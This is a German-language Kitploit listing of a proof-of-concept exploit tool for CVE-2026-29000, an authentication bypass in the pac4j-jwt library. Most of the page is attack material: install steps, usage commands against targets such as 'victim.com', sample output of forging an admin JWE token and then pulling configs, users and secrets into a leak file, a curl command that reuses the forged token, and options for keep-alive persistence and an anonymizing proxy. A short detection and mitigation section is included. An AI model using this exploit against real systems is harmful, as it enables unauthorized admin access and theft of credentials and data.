Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-29000-PoC-Exploit — CVE-2026-29000 – pac4j-jwt Authentifizierungsumgehung (🔥 CVSS 10.0). Ein-Klick-Admin-Fälschung mittels Public-Key-JWE-Wrapping. Leakt Konfigurationen, Benutzer, Geheimnisse. Keep-alive, Proxy, benutzerdefinierte JWKS.⚙️ Bildungs-PoC-Exploit-Tool. | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-29000-poc-exploit
Authentifizierung & AutorisierungPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & BildungRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubtc4dy/cve-2026-29000-poc-exploit

CVE-2026-29000-PoC-Exploit

CVE-2026-29000 – pac4j-jwt Authentifizierungsumgehung (🔥 CVSS 10.0). Ein-Klick-Admin-Fälschung mittels Public-Key-JWE-Wrapping. Leakt Konfigurationen, Benutzer, Geheimnisse. Keep-alive, Proxy, benutzerdefinierte JWKS.⚙️ Bildungs-PoC-Exploit-Tool.

Repository anzeigen
3vor 2 MonatenNoch nicht geprüft

🚀 CVE-2026-29000 - Exploit zur Umgehung der Authentifizierung in pac4j-jwt

Python CVSS License Pentesting

CVE-2026-29000 - One-Click Admin-Erstellung per JWT alg:none + JWE-Verschlüsselung

📌 Übersicht

Dieser Exploit nutzt CVE-2026-29000 aus, eine kritische Schwachstelle mit CVSS 10.0 in der pac4j-jwt-Bibliothek. Durch das Extrahieren des öffentlichen JWKS-Schlüssels des Servers und das Fälschen eines verschlüsselten JWE-Tokens mit alg: none wird eine vollständige Umgehung der Authentifizierung erreicht, die mit einem Klick Administratorrechte gewährt.

🔥 Hauptfunktionen

  • ✅ Keine Authentifizierung erforderlich – Ausnutzung vor der Anmeldung, keine gültigen Anmeldedaten nötig
  • ✅ Automatische JWKS-Erkennung – Scannt 15+ Endpunkte, Unterstützung für benutzerdefinierte Pfade
  • ✅ RSA-Schlüsselextraktion – Holt öffentlichen Schlüssel, konvertiert JWK→PEM on the fly
  • ✅ JWT + JWE-Fälschung – Erstellt alg:none-JWT und verpackt es mit dem öffentlichen Schlüssel des Servers
  • ✅ Vollständiges Admin-Token – ROLE_ADMIN, admin:true, konfigurierbare Gültigkeit
  • ✅ Authentifizierungsumgehung – Testet automatisch 8+ geschützte Endpunkte
  • ✅ Intelligenter Informationsabfluss – Durchsucht 20+ sensible API-Pfade
  • ✅ Sitzungspersistenz – Keep-Alive-Thread erhält den Zugriff aufrecht
  • ✅ Proxy-Unterstützung – HTTP/HTTPS-Proxy für Anonymität
  • ✅ Dateiexport – Gespeichertes gefälschtes Token + abgeflossene Daten in Dateien
  • ✅ Wiederholungsmechanismus – Konfigurierbare Wiederholungen bei instabilen Verbindungen
  • ✅ Farbige Ausgabe – Professionelles, phasenbasiertes visuelles Feedback
  • ✅ Ausführlicher Modus – Debug-Logging zur Fehlerbehebung
  • ✅ Keine fest codierten Verzögerungen – Nur Wiederholungs-Backoff und Keep-Alive-Pings

🎯 Anfällige Versionen

BibliothekBetroffene VersionenGepatchte Versionen
pac4j-jwt< 5.1.5≥ 5.1.5
pac4j-jwt4.x < 4.5.8≥ 4.5.8
pac4j-jwt3.x < 3.18.6≥ 3.18.6

⚠️ Haftungsausschluss: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Red-Team-Einsätze bestimmt.

📦 Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-29000-PoC-Exploit.git
cd CVE-2026-29000-PoC-Exploit
pip install -r requirements.txt
python exploit.py --help

requirements.txt:

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
pyjwt>=2.8.0
cryptography>=41.0.0
jwcrypto>=1.5.0
colorama>=0.4.6

🚀 Nutzung

Einfacher One-Shot-Exploit

root@kitploit:~
python exploit.py --target https://victim.com:8443

Gefälschtes Token + abgeflossene Daten speichern

root@kitploit:~
python exploit.py -t https://target.corp:9443 -o admin.jwe -l stolen.txt

Ausführlicher Modus mit benutzerdefiniertem JWKS

root@kitploit:~
python exploit.py -t https://example.com:8080 --jwks /oauth/jwks.json -v

Mit Proxy und ohne Keep-Alive

root@kitploit:~
python exploit.py -t https://192.168.1.100:443 --proxy http://127.0.0.1:8080 --no-keep-alive

Benutzerdefiniertes Keep-Alive-Intervall

root@kitploit:~
python exploit.py -t https://victim.com:8443 --delay 10 --max-retries 5

SSL-Überprüfung aktiviert

root@kitploit:~
python exploit.py -t https://legit.com:8443 --ssl-verify

⚙️ Befehlszeilenargumente

📸 Beispielausgabe

root@kitploit:~
$ python exploit.py -t https://10.10.10.100:8443 -o backdoor.jwe -l leak.txt

╔══════════════════════════════════════════════════════════════════════════════╗
║     CVE-2026-29000 - Exploit zur Umgehung der Authentifizierung in pac4j-jwt║
║                    Die lehrreiche One‑Click Admin‑Erstellung                 ║
║                            CVSS 10.0 - KRITISCH                               ║
╚══════════════════════════════════════════════════════════════════════════════╝

[11:23:15] PHASE 1: Beschaffung des öffentlichen RSA-Schlüssels aus JWKS
[11:23:15] Suche nach JWKS-Endpunkt...
[11:23:16] JWKS gefunden unter /realms/master/protocol/openid-connect/certs
[11:23:16] Öffentlicher RSA-Schlüssel erfolgreich extrahiert

[11:23:16] PHASE 2: Erstellung eines JWT mit alg:none & Verschlüsselung in JWE
[11:23:16] Gefälschtes JWE-Token (gekürzt): eyJhbGciOiJSU0EtT0FFUC0yNTYiLCJlbmMiOiJBMjU2R0...
[11:23:16] ✓ Token gespeichert unter backdoor.jwe

[11:23:16] PHASE 3: Senden des gefälschten JWE als Bearer-Token
[11:23:17] ✓ Authentifizierung erfolgreich! Zugriff gewährt auf /api/users/me

[11:23:17] PHASE 4: Aufzählen zugänglicher Endpunkte und Offenlegen sensibler Daten
[11:23:18] ✓ Abgeflossen: /actuator/env (Status 200)
[11:23:18] ✓ Abgeflossen: /api/users (Status 200)
[11:23:18] ✓ Abgeflossen: /api/secrets (Status 200)
[11:23:18] ✓ Abgeflossen: /config/server (Status 200)
[11:23:18] ✓ 4 sensible Endpunkte erfasst → in leak.txt gespeichert

[11:23:18] Keep‑Alive-Sitzung aktiv (Strg+C zum Beenden)
[11:23:18] Token (JWE) gültig für ~1 Stunde – bei Ablauf neu fälschen

🧠 Funktionsweise

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  PHASE 1: Beschaffung des öffentlichen Schlüssels                │
│  ├── JWKS-Endpunkt entdecken (15+ bekannte Pfade)               │
│  ├── JWK mit öffentlichem RSA-Schlüssel abrufen                 │
│  └── JWK → PEM-Format konvertieren                              │
├─────────────────────────────────────────────────────────────────┤
│  PHASE 2: Token-Fälschung                                       │
│  ├── JWT mit alg: "none" erstellen                              │
│  ├── Admin-Ansprüche einfügen (ROLE_ADMIN, admin: true)         │
│  └── JWT mit dem öffentlichen Schlüssel des Servers in JWE verschlüsseln │
├─────────────────────────────────────────────────────────────────┤
│  PHASE 3: Authentifizierungsumgehung                             │
│  ├── JWE als Bearer-Token senden                                │
│  ├── 8+ geschützte Endpunkte testen                             │
│  └── Sitzungscookie extrahieren                                 │
├─────────────────────────────────────────────────────────────────┤
│  PHASE 4: Informationsabfluss                                   │
│  ├── 20+ sensible API-Pfade aufzählen                          │
│  ├── Konfigurationen, Benutzer, Geheimnisse, Umgebung sammeln  │
│  └── Alles in Leak-Datei speichern                              │
├─────────────────────────────────────────────────────────────────┤
│  Keep-Alive: Ping /api/ping alle N Sekunden                     │
└─────────────────────────────────────────────────────────────────┘

🔧 Manuelle Token-Verwendung

Nach der Ausnutzung das gespeicherte JWE-Token mit curl verwenden:

root@kitploit:~
curl -H "Authorization: Bearer $(cat backdoor.jwe)" https://target.com/api/admin/users

🛡️ Erkennung und Abwehr

ErkennungsmethodeIndikator
Log-AnalyseJWT mit alg: none in Audit-Logs
NetzwerküberwachungJWKS-Endpunkt-Anfragen von unbekannten IPs
Versionsprüfung`curl /actuator/info

Maßnahmen zur Abwehr:

  • pac4j-jwt auf gepatchte Versionen aktualisieren (≥5.1.5, ≥4.5.8, ≥3.18.6)
  • Die Unterstützung von alg: none im JWT-Validator deaktivieren
  • Strenge JWE-Validierung implementieren
  • Auf anomale JWT-Strukturen überwachen
Tool herunterladen
ArgumentKurzformErforderlichStandardBeschreibung
--target-tJa-Ziel-URL (z.B. https://example.com:8443)
--jwks-kNeinAuto-ErkennungBenutzerdefinierter JWKS-Endpunkt-Pfad
--output-oNeinNoneGefälschtes JWE-Token in Datei speichern
--leak-lNeinleaked_TIMESTAMP.txtAbgeflossene Daten in Datei speichern
--verbose-vNeinFalseDebug-Ausgabe aktivieren
--proxy-pNeinNoneHTTP/HTTPS-Proxy
--user-agent-uaNeinMozilla/5.0...Benutzerdefinierter User-Agent
--no-keep-alive-NeinFalseSitzungs-Keep-Alive deaktivieren
--delay-Nein5.0Keep-Alive-Ping-Intervall (Sekunden)
--max-retries-Nein3Maximale Wiederholungen pro fehlgeschlagener Anfrage
--ssl-verify-NeinFalseSSL-Zertifikate überprüfen